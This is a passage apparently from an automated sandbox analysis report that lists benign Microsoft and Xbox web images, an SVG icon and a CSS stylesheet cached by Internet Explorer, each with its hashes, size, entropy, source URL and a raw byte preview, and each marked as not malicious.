                                                                                                                                                                                                              SHA-512:FD74FC0ADFA0F79E31BC7FC5D0FF8C7DE7889AC6411B5F96BFF559B2A4D661D1DC4A5BE9710B8CF05ABA3C960238FE6EECA95BC200DB6EBB0CABBC5E3ACCB72B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel15_Mosaic_Item1_Gray.jpg?version=e49dd563-5b13-e4ff-b8f6-2e96c5ed16d0
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E848B42D5CB911EA88EEDBD181122FD0" xmpMM:InstanceID="xmp.iid:E848B42C5CB911EA88EEDBD181122FD0" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C" stRef:documentID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1399_Panel15_Mosaic_Item2_Apps[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 350x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):28696
                                                                                                                                                                                                              Entropy (8bit):7.969152556506118
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fgh5It9O4QTtI5j8tuUogTb6hYz00nwiYbT9Lr2KktXs1WsP7rUpO1gf6P7c:Ht/QTu526gTb6hYz5nNYbxLrjktaGO4
                                                                                                                                                                                                              MD5:9E801D21087C43510C667927D9A22250
                                                                                                                                                                                                              SHA1:6E595435B791D81B91487D784E1E5B769B9A1B1E
                                                                                                                                                                                                              SHA-256:09595DB7E324D5A8253FC5E394FD2716CD21B80380D2F15A8D1C6A14B58A6E81
                                                                                                                                                                                                              SHA-512:5FDD565370BD9F224215EA4CE20903E9472376F892F2F908A1D68515444790054D32C6307FEA6912B6911A126ACFDE44D2FBB1737E1E77741F13CEB071CA360E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel15_Mosaic_Item2_Apps.jpg?version=cb834e50-0137-d760-3519-27d35a94c490
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................^.....................................................y..4..*.([.G.dg...bcG....H.R..Z..yd..y..@sn.t.~.v.OZ..Y;..\.m...dy{..=22....g....m.sJ..I...=.w..[a...lbA..A...9.E.l7..0.s.X... ..2y..Z.4.....C..W.U..N...}.0...Yd...^..l.&m..Q9..K.3Oi.h....l..").i..e.G.s.OG.d.b...`7.FX<..P..!X.t].....9.....3..<..~].x`...@.&!.,.'+[Lx.k.r...I....1.......W=...1p.*...&`....&.....Q..-..^z..Ze...2.....3z.../..Y..]O...1KF&.B..........J..<.8.....H.}'..../=.k&.0.....N....#.].......l....k!..F..&ghB.E...ea..1..../{......o..d...j9.c..g.LcY..v.:e7k..> .FO.\...9.7i.CLa.|.{.....W.O...-..M.....~6.Vbc....jW...:..........*......jBn>.!.Yf9......./.O.>a.FA.h.g...yo.L.6..F=..8Jt./S....m6<1....Eq..Z.w.[.@..3Q..6...9.~`.6!..NRr.....Z9.......w...i."./..^7...b..j..t9xz.X.)..!.G..G..W..t..}..>Z.M...F..S...,V.....x}.......
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1399_Panel15_Mosaic_Item3_Lenovo[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 350x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):21307
                                                                                                                                                                                                              Entropy (8bit):7.930677265774077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:f0K/QCayhiOLul8+WrJiO3R4rbPRKajWigMENAdDxUkW9zSjVZbDWa+XADfUQ:7QCBoUul85di+4rbJcihEyxqkDjzKa+e
                                                                                                                                                                                                              MD5:844F49653D918BAA03B1A1C2E8A8ABC5
                                                                                                                                                                                                              SHA1:B7CD75384DED83FC65C5ADE011E3557BC0D8E925
                                                                                                                                                                                                              SHA-256:757A6E762929D2C52BFA35B14B85AD376C1A6DBCDCB731BF2CDC041D8EBAB0E2
                                                                                                                                                                                                              SHA-512:88E939AC91BC106F6FBD05C4E24A3FF79AA1E9F0910EDD7456A183B67C52C7C1DA74CBE5DB0B97C67C8D16A5F100275D2406CC7734B9FCB9A319918B711A25AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel15_Mosaic_Item3_Lenovo.jpg?version=c499cdf4-3641-3e23-521d-b2c53bf5267a
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................^......................................................6).B..5?I.NA..#.B.^...m.d..g.2-.#$....'.r.R..1.?yzJ).hb..#..k..I.2r.......RQ...]!..9..g...)....QQx..Q.A.2NRM.....-6.3.R.p.&7)JRD..L..H@,s...M..CL.A&.q..Ac.-!...cr.....QjQh..c...Qi..... $..&....-.J.sI..2C...&'.E.?......HR..cbR............*.nz'Z...a)). D.X.bc_>gl8<...r...''!M5..n.$.....Qt..:.\b.54...p.&.q..t.c....n...S$...(..."......xV.u..{..e.A$.!.I...A!..>...j..|......F(......z .r.|...^~.....x...j.;. ..#..8....@....<.._..m.O.....K....# .M.$..5>.>...R..q.u...w.p..@.g.&.t-U;.........Z.~{._.]+..1.Z...!..G..F........C...x....v...$80..._?.x..U.zbe...7....Z..@.t.... .!Hl..E..n..o?(...gl....>O.7-.a.x..A8.D..c.s.E#:.L..d.afn9.U...W.g...w.1m5........{I.....L=._:.:+_.V^.pk}.m......[..8.....H..jZ.\>n.R:GT.....~g.t....l..14)..1yj)T*u3E....<9n.U...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel09_4Up_Neurodiversity[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):25688
                                                                                                                                                                                                              Entropy (8bit):7.966149094108372
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fdeYmDj47zysyisSkjmJNPVtAFW8DUKv8YkaqGBtMgIcK+zL5K7m5KGlNSR8EA8o:lpyYn2WNdz8DUKUWBx2+8SgGPv3f17
                                                                                                                                                                                                              MD5:F414004523ACB5F130B35B68089BBED7
                                                                                                                                                                                                              SHA1:8218A2EAC55E16F0BF5EE2405A8D4D59E07422F0
                                                                                                                                                                                                              SHA-256:F65BDE6071BF29361D26BE6D2489B585AFD9F2A952736A560E379FCAA0C79EBE
                                                                                                                                                                                                              SHA-512:DE2D253EB5BDB641C209BACC035AD0F635888C81BB4637A8070D1C1700F9BAB98C6DD7F09895ACD58277874C131BCF5C2EF482BE1A6066AABA01B5EDA8F85E6B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel09_4Up_Neurodiversity.jpg?version=58c953a3-f516-82b0-2f94-398392076f5e
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f.....................................................(.d....;...v.:w..A....^...@...u.IR...+^..Ia..JT."..DAl......._P..1U\.~,M.S.\.t..T.....'Dwsy.^{.d#.fae...w.z..~.....W......"../..._..9&..\1.V....../.yC..n.A...W.3Q.y.. ....~..c..#.....2.j.6..x6a.........ku..%:...{..|...o^.......t.d;.R...gy...z}&..P.c...T%f...r...M.{.U.A.v.D......N...GUr.."E....Y...9........,....j<...)_)4~..n.....y1...aQb...8:.P.).....z.c..NG .]..4!b..t..y....zY.!.W... ...gX.=#.x/....B5.S].1..U+..~W....R.m.....o....<..q..v.u-....gC.=..b.q....].a...e6.\]..P..`.,;...&K.@...d..x....b${..h..9.b...CG.......=.......tI.).B..s...o....:G#..G9.z^....=|.+.....r..\n3..|y/+....S..U...........T...#.`....C..3Z...I.u..B.C...D~...]..d...........=..b.z.#EI...i...0..w.n.i.....J...}Ok\..j....a.j.....y....B.8W...^c.B.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel11_4Up_Connect[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):25325
                                                                                                                                                                                                              Entropy (8bit):7.961526581425028
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fz/kz/XZzx7jmMqXT53ThsHryhfDU9Mkfg9KM5suKlxLcpt2GcnqBtx17hdwa:YRxdqXlDWHryhflkfg9LsdrLstZ9Pz
                                                                                                                                                                                                              MD5:98A5534D064F59AE20CDBD268EC511E4
                                                                                                                                                                                                              SHA1:41C230B7B088CEA5D63D04C734FF117949BE2669
                                                                                                                                                                                                              SHA-256:C350649E8D2487A1EDCEB3A2C960BB2BB51377ACE42FE8236B2243CC588FF6F7
                                                                                                                                                                                                              SHA-512:7AB45C5DC9D3336CB6B178F70B1A55AABBD0ACEF5E40129805E84712C471235F0A7B089804BC3DEB912E4DB3B714CD1F04F07046640F9D38E1E1D7D5715FEB4D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel11_4Up_Connect.jpg?version=f006d2a3-0493-ad44-261e-57c70c8a5884
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f....................................................W=...Y....vce ..z.%@[.....y..Y?8...RP;...@...9..=..Jk.v..B.@..R3{g.....7...t+=*.,_....k..l..#...R..Q.r..V....C..v.6..^..z_.......LNnNl...}./...>.7H.Wk.........U...-.Q...8.T.......b...P...o.S*.......C.....T..E}jwk...s:..z...X....4+ .....=....k....w@..r.|._."B?d..F.d....^.....%..+....y.$po}..w4+ .......2.6.$.G7....hV@)P.%x.`..e..s.tl./G.....c...g...d......+.m.7.r.T..'R.|..w-/a...d......;.x....}....z....d.....+ .....8....+k.....q...N....h.`..K....T........7_E.{..u..a.<.3....B..J.xKZ..S.........w.9..oS..'.oX..F.d......8.p?_8.9.9...a.s.....d..M...*..E^;-K{E...|..r ....Y..@!..6.9....+..p..N=I.}bd...c.l....T...V.;.n.`|.cS.7..t....oBc.t...Y..@1.?..t..}^...?.......@S..w..0.....~..x.]........'...r.........TV...d........a.Il#_..........}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel11_4Up_Organize[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):25130
                                                                                                                                                                                                              Entropy (8bit):7.972294216006464
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:jhfx6DSxhFFs5sLAcBDqF+XlqQru6+wbAR6:jhfdheLcBD4UlRCrAC6
                                                                                                                                                                                                              MD5:C5929885CA94723FB26195043F93396A
                                                                                                                                                                                                              SHA1:92247A850DFA048529C387CC9AA3B30453DF2425
                                                                                                                                                                                                              SHA-256:F46F50E5B4A3F0C7A47E73A9C04C94D224C2E3262E596B3714AB8D419BF554FF
                                                                                                                                                                                                              SHA-512:08E91764F4C98354BDB0FF553239883459970E339D24A745D7A08C13610BC5A9B283CD1B4DC70AD459349F9D51CE1C97F0C4C5717CCBC7CA1C08C79FCA53CACF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel11_4Up_Organize.jpg?version=89901e39-7dfb-9f82-820e-0748738660e5
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f.....................................................U.S.......>^....w..9.W.Q..(...._....U.......`...v7<....8.O...^[..8Wq....;...}-....Y\.X..&X.a.%.:.Yg.....d...bl..z.z_.f.C....T....Q.>.?...e...v_.n.<F..i`....sY.9......{.Y......5..........B.8j..(..(.Q...:.*jOl._OMy..T.O._C'.\d.Nc.Xp:7P....h.R....9.$7..cz...\.-...d.>5.....)r.I...\$..:v.otX.n.|y..../=./.........3(p}.Oj^h...j..E...?.;]...y.L+Y......Hs..:......>.. ..2E.4+.......[h......d.E...L..FF:.v".,.fY....._5....}.]...[.tt...E.c.^........t_..3.......'8.O..2Avm...k..Z...C.V...|.:.J..U...6...~..uH..y....)Z.'E.T..W..2y....ff.5.Xg.D.V7..J....+.../I..Dzx...}..X.....v.|...\....C2,3dy&^.....@.x/=.c...r.%...... .......Pggu.Q........N...=.'E.lz.`.-...+..m,R.9P...)B)r..(..|e.4zM.V=c...r..x1.....U.}'G.v.p..4V.k.Z.c.G".....~/?........*
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel11_4Up_Protect[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):36343
                                                                                                                                                                                                              Entropy (8bit):7.976599466340477
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:uFTsWmHDul50UfC1PRmTUQDQcWgb54DfGYKlNsA:u+300UfQZmTJDnWgb5JWA
                                                                                                                                                                                                              MD5:2CED0EF9918A9AFC1F80AE167E1EADF5
                                                                                                                                                                                                              SHA1:745C5891D508F921810A5F9FFDEC1372666F433D
                                                                                                                                                                                                              SHA-256:28BE9E2A8C74168CF2E529A51E50322EC938F2DADEE86A1963EEE07C78E43A81
                                                                                                                                                                                                              SHA-512:79566B7EF17703C9B6A0E95FF93B2D572A2DC5C5F6FBE5E331BC2D829341C4FF8C7CF85756F83527ED46D35C562595EA1F1EA0138690936C1CFE3C4F5C8436A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel11_4Up_Protect.jpg?version=fbfe02b1-43cc-8090-aa47-d36c4d6969ec
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f......................................................K...".........{m.-.(.j.{4iF........a.z.5.$.n.......cg.....T...6.L.~..B\B5..X.<..UR....,..3z..S....5.3.F..]_@.......ju.)..\t.2.<9..........N1............u....~.....{....5...n-.J]...Gv..W...._.......<.[.}.x...Z..H..O ...K......R.Gk._..3...pz../..[1l....9....T....'......}._..l.{.......7r&^..b...5...=......$k*...>+|s.V..6..*.\.B.V..J=....,.l...._as%...?....Oa.m<....>&d..i...-..ln..c.._W....N..3...m>.R0I.o(...ZDc7.2...._..qh...T.S.;...L...Y7.DJ9.....<ac.>.....Iau...Y._...-_UD!..kF_7..x.M...,...v.=..n.M....{...p..w..............i[.^.I5..I..%w..V'.........uSo<<..Z.@.Ui..t....B.....j+....n.t.jc.'..U.%.....,U..Q^.....8S.....o6..._T|....M....?.}......g...|w..hU../.-:.?.B\......uk+.5-.C..,..W..+..nv.2.@.K.R7~jj.u..6.|..s...\.h....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel12_HighlightFeature_Thousands[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1600x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):130511
                                                                                                                                                                                                              Entropy (8bit):7.95957410307785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:73X4pnxLacZQuCe72WsChrbFcMJTNM6R6jQ9WMZf9N:DopnAcZz72i7TRNM6R2MB9N
                                                                                                                                                                                                              MD5:F2362834B21B4ED394610B02C38B88B0
                                                                                                                                                                                                              SHA1:1E00FFB3C11403739EE85CCDFEAEF405D4612B9A
                                                                                                                                                                                                              SHA-256:12AD4321B527F0071B24C58E8B311578613FE22843FF6127936DEF8494318BCB
                                                                                                                                                                                                              SHA-512:5818C3E6E4C9C9DFFC7E097A5A21777B61743E866066A1537C52D63C780AD47F31252527CB42CC154ADE5CCB1D919F7D27A62385D0307BF8517A951B244E277A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel12_HighlightFeature_Thousands.jpg?version=8f164e0a-0d36-0e93-4716-9698b8afa0a6
                                                                                                                                                                                                              Preview: ......JFIF......................................................................................................................................................X.@.....................................................f....<.......^.0.>/oi\!w.{.(P...N3...._}.6/.."....!.............N.._.....K..G.qq.....}./...{.h...=#.?=..>.z.6..=..t....@h=W.mh..H.+.&..[.n.Y..N..O."Nk....m>xu....;....^..W;...@.... ../..K..._.....^....V....>.....Wo.......%....u....G.4...~K._.>.G...(.3......~...].M..x..)l......co.......H.2l.B|..r..6Z...[N..X..-.f...9..S..d._.......3.r./....'/.;ypZ..o.;W...K.e.%....W.}..?,~../...%....aB..>6..J...vH./..KsM..4jA.[.}.n.Z....."L...?2.L{/....@.$.xa..)m-......+....\...../..{.x.L...{FDHP....&.}..~K.g..._*|..}3.&K..%./..O.>....-....>..%./.............Ms..)^F..q..n....vUj..]u.2f..|..7u.C.......'' .......?x_......>...6..Z...W?..]....P.]...q.%5T._}.d....l..~K..~K....z......?6.+.(...._....W.q ....U..d.....+.F...[.q.j.n.....[.~o.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel14_2Up_Windows10[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 740x417, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):63638
                                                                                                                                                                                                              Entropy (8bit):7.9681274434961
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Rq4gezwBpM6epXAyylnh3bwE6qnH5IyOrM6GPnxt:RNfzwU6eJylnh8Tl/Axt
                                                                                                                                                                                                              MD5:7D668C61CB963AAC0C32623A1ABC6A47
                                                                                                                                                                                                              SHA1:366C1112BC4B01EADE7F186A9DBF1E3460129C8D
                                                                                                                                                                                                              SHA-256:35C99C6659EEC1A05DF9A9B5BDDEFF295EDA615710F998F846442253079E7956
                                                                                                                                                                                                              SHA-512:50231082F12D0EDB2723A237FEA1A606D4062B3D43F40F065D42A8CAE5EA94B88F640BA34F2B8DDCD1BE03749D2842BC62045B5A9A4DD87329BE918065152B45
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel14_2Up_Windows10.jpg?version=4339ce9b-489e-175d-9931-56d8dab88d70
                                                                                                                                                                                                              Preview: ......JFIF..............................................................................................................................................................................................................`................0.[i..f#..C.7.....]..i._X..............7I.2....".1.C...>J.5...-:.r...E............M.(...7:kA...|f.OM./.e.1.....cj.V...............8HG]}.....Q...rs/............5.@..Xgy...............c*.;G*.....C.OV...K...g9......W..W....................48Z.f$.....4.U.....W.eh\G.n{.%oV.............P."..V[c-...5g.....P.....].o.F.E.t..e...........Hi..f<xl'.c.D..c..T...Q..P......................6.i1..xy`Tw^...>..?.l..,...S.)w9.y._.=...y.@.........+l..V."...e...0.o.Z.."d....TfE....G>N.K..s.>.R....Wrm.~.....e...q.aN%.R..v.....g9..*....D5}?f.-|).K.._.=...y@...=.^q.G.@.#.l1...1.1p..;.NDF{nR...J...5.B...X..[.T.p...ZX....R..@.9M......p...5sL3.......Ky../oW.+ .l.......#c.:-}.../Ou...Y+^s.B.n.].W.....0..^..e.9f+j...s...:..@..a.*....Pi..z.tZ.O+.==yz..c.sI.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1920_Panel2_LinkNav_Support[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1572
                                                                                                                                                                                                              Entropy (8bit):4.337612931532727
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:hXKQxgL14FmX34y6mdUmnlWAeSDyCEXanaNQR:RKQxEEgplWAEhaaWR
                                                                                                                                                                                                              MD5:DEC312B88B1DE3A87A6966F64A3CAD21
                                                                                                                                                                                                              SHA1:6C2A02A86B2CE360EAA763B0B5C7D393A1CD6D37
                                                                                                                                                                                                              SHA-256:EDF11515F06316F47B01E94348814842BA23E7B051F1A851D3798530C66EFC56
                                                                                                                                                                                                              SHA-512:9390112CFB4195ABA89DEBA391993A8B801D89AE3A622036255FADFB3EAA4E815EE8347E5FEB9E84545A78E7789E7F6FBBF26309DF6FC2C72F6CA1B5DB083F05
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel2_LinkNav_Support.svg?version=b7eccaaa-0dd4-d22a-49c5-7b1e7648f706
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 64 64" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><path d="m43.855 23.598c.107.457.191.917.251 1.38s.089.929.089 1.397c0 1.734-.325 3.311-.975 4.729s-1.59 2.736-2.818 3.955c-.99.984-1.751 2.06-2.281 3.226-.531 1.166-.796 2.446-.796 3.841v4.5c0 .469-.089.908-.268 1.318s-.423.768-.734 1.072-.674.545-1.092.721-.866.263-1.343.263h-4.581c-.477 0-.925-.088-1.342-.264-.418-.176-.781-.416-1.092-.721s-.555-.662-.734-1.072-.268-.85-.268-1.318v-4.5c0-1.395-.265-2.675-.796-3.841s-1.291-2.241-2.281-3.226c-1.229-1.219-2.168-2.537-2.818-3.955s-.976-2.994-.976-4.728c0-1.137.149-2.232.447-3.287s.722-2.039 1.27-2.953 1.208-1.749 1.977-2.505 1.619-1.403 2.55-1.942 1.933-.955 3.006-1.248 2.19-.44 3.347-.44c1.646 0 3.221.299 4.724.896s2.845 1.465 4.026 2.602l-1.61 1.6c-.966-.914-2.064-1.617-3.292-2.109-1.229-.492-2.511-.738-3.847-.738-1.42 0-2.756.267-4.00
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\3c2e3032-f973-48c9-bcf6-c98aca12559d[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1920x720, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):92548
                                                                                                                                                                                                              Entropy (8bit):7.455446004174176
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:aNV42Fa7X/42aM1HvrnOs2VHHvNquus2Q0hTe7o4ZqxIO4i:Hw0X/4fM1PaDVHoTnha0gq2i
                                                                                                                                                                                                              MD5:3A0EFE83F7E77B4A7699C812FC867F34
                                                                                                                                                                                                              SHA1:A5C1CF5A0005382BF9372D2D08DC2CACA7C31D1F
                                                                                                                                                                                                              SHA-256:CF7640B18C5F71F5D5FF0CB5FE51113F794528173BDDD00CBB974DE6D7C5A3B0
                                                                                                                                                                                                              SHA-512:B84132538369168A258C96E6E6F30824ACFC7C94335FF94249E1965FAFB99544CF8816DE12492D7CC45A8E68EE9B22D0D15C9E58BD4258987471F40EA7850B01
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/3c/2e/3c2e3032-f973-48c9-bcf6-c98aca12559d.jpg?n=FIFA-21_Page-Hero-1084_EA-Play_1920x720.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...................................................................................................u..........!.1A..Qa."q.2...#Bb...3CRr......$4S.........%&'()*56789:DEFGHIJTUVWXYZcdefghijstuvwxyz............................................................................................!1..AQq..."2a...Bb.....#............$%&'()*3456789:CDEFGHIJRSTUVWXYZcdefghijrstuvwxyz...................................................................................?...z.....................................................................................................................*.*...........UP........T*............0.@`.....@......W........T...PT..*QP......P*......EU..U....QUQEU..\.*.EUAP..UTQU@.(...T*.(...T*.EU.....UT.\.T......U.U(..*......z......................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\43-edd42d[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):147091
                                                                                                                                                                                                              Entropy (8bit):5.057110147777966
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:+b7WlUFsPEUybEYjUDUXUOj+rydaS+U/7a9vnfUV7BJsK:8FnJsK
                                                                                                                                                                                                              MD5:DF518932CD4DC16E76DBBA0FEC909796
                                                                                                                                                                                                              SHA1:93C2F3BF025A648F5642209B5E6192FB9FC6E86F
                                                                                                                                                                                                              SHA-256:F42B7E60CC86B00C383D48A807959B9B36954483795A2F0E50477C31DEC84CB7
                                                                                                                                                                                                              SHA-512:252180D3B349A9A7F2C599024C85AEA1814680BBB188468C74B919DAB8E1B43272A2552B16E683B61C92568805342D98DED1E8E56818CAA5E1A25EC2E8D77466
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/microsoft-365/_scrf/css/themes=default.device=uplevel_web/e7-e4b626/b5-285959/2c-635258/97-8c42a8/33-100b4f/a8-eb2884/87-c2d08b/b4-77b8bb/8c-33c91a/6a-f0f06f/84-ec5ba2/7b-b85c60/81-8f5a7f/43-edd42d?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: .ow-theme-microsoft365 .ow-theme-cl,.ow-theme-microsoft365.ow-theme-cl{color:#0078d4}.ow-theme-microsoft365 .ow-theme-cl-imp,.ow-theme-microsoft365.ow-theme-cl-imp{color:#0078d4 !important}.ow-theme-microsoft365 .ow-theme-btn-fill-imp,.ow-theme-microsoft365.ow-theme-btn-fill-imp{background-color:#0078d4 !important}.ow-theme-microsoft365 .ow-theme-btn-outline-imp,.ow-theme-microsoft365.ow-theme-btn-outline-imp,.ow-theme-microsoft365 .ow-themed-button-outline-imp,.ow-theme-microsoft365.ow-themed-button-outline-imp{outline-color:#0078d4 !important}.ow-theme-microsoft365 .ow-theme-bg,.ow-theme-microsoft365.ow-theme-bg{background-color:#0078d4}.ow-theme-microsoft365 .ow-theme-bg.ow-bg-alpha-0,.ow-theme-microsoft365.ow-theme-bg.ow-bg-alpha-0{background-color:rgba(0,120,212,0)}.ow-theme-microsoft365 .ow-theme-bg.ow-bg-alpha-5,.ow-theme-microsoft365.ow-theme-bg.ow-bg-alpha-5{background-color:rgba(0,120,212,.05)}.ow-theme-microsoft365 .ow-theme-bg.ow-bg-alpha-10,.ow-theme-microsoft365.ow-theme-
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\52-7ec320[1].css
